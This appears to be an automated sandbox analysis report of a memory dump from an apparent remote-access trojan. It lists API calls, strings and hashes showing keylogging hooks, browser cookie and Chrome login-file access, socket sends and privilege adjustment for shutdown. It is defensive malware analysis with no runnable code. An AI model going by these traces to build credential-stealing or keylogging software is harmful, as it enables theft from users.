                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 1164774033-405221262
                                    • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                    • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                    Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                    • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                    • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                    Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$CreateFirstNext
                                    • String ID: 8SG$PXG$PXG$NG$PG
                                    • API String ID: 341183262-3812160132
                                    • Opcode ID: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
                                    • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                    • Opcode Fuzzy Hash: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
                                    • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                    Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                    • GetLastError.KERNEL32 ref: 0040A2ED
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                    • TranslateMessage.USER32(?), ref: 0040A34A
                                    • DispatchMessageA.USER32(?), ref: 0040A355
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 0040A301
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error
                                    • API String ID: 3219506041-952744263
                                    • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                    • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                    Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0040A416
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                    • GetKeyState.USER32(00000010), ref: 0040A433
                                    • GetKeyboardState.USER32(?), ref: 0040A43E
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                    • String ID:
                                    • API String ID: 1888522110-0
                                    • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                    • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                    • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                    • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                    Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                    • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    • Opcode ID: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                                    • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                    • Opcode Fuzzy Hash: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                                    • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                    Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-2876530381
                                    • Opcode ID: 7d52df1408e09a8eb3982e7da52f878f0a451a5f56a7a2098f3d013e22341463
                                    • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                    • Opcode Fuzzy Hash: 7d52df1408e09a8eb3982e7da52f878f0a451a5f56a7a2098f3d013e22341463
                                    • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                    Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                    Strings
                                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpen$FileRead
                                    • String ID: http://geoplugin.net/json.gp
                                    • API String ID: 3121278467-91888290
                                    • Opcode ID: 585d05e2e02a37e8c452ed33f1419606295c771b0cc2953abdb39425aade45c9
                                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                    • Opcode Fuzzy Hash: 585d05e2e02a37e8c452ed33f1419606295c771b0cc2953abdb39425aade45c9
                                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                    Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                    • GetLastError.KERNEL32 ref: 0040BA58
                                    Strings
                                    • UserProfile, xrefs: 0040BA1E
                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                    • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                    • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                    • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                    Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                    • GetLastError.KERNEL32 ref: 0041799D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                    Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00409258
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                    • FindClose.KERNEL32(00000000), ref: 004093C1
                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                      • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                                    • FindClose.KERNEL32(00000000), ref: 004095B9
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                    • String ID:
                                    • API String ID: 1824512719-0
                                    • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                    • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                    Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID:
                                    • API String ID: 276877138-0
                                    • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                    • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                    • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                    • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                    Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                      • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                      • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                    • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                    • ExitProcess.KERNEL32 ref: 0040F8CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 5.0.0 Pro$override$pth_unenc
                                    • API String ID: 2281282204-3992771774
                                    • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                    • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                    Function 0045243C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 004524D5
                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004524FE
                                    • GetACP.KERNEL32 ref: 00452513
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP
                                    • API String ID: 2299586839-711371036
                                    • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                    • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                    • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                    • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                    Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                    • wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventLocalTimewsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 1497725170-248792730
                                    • Opcode ID: 874391c71ba160f51d9f8de8278d9470b21335720a9f8d42306f4a5fe414c82b
                                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                    • Opcode Fuzzy Hash: 874391c71ba160f51d9f8de8278d9470b21335720a9f8d42306f4a5fe414c82b
                                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                    Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                    • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                    • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                    • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                    Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0040966A
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNext
                                    • String ID:
                                    • API String ID: 1157919129-0
                                    • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                    • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                    Function 00452610 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • GetUserDefaultLCID.KERNEL32 ref: 0045271C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004527ED
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID:
                                    • API String ID: 745075371-0
                                    • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                    • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                    • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                    • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                    Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00408811
                                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                    • String ID:
                                    • API String ID: 1771804793-0
                                    • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                    • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                    • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                    • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
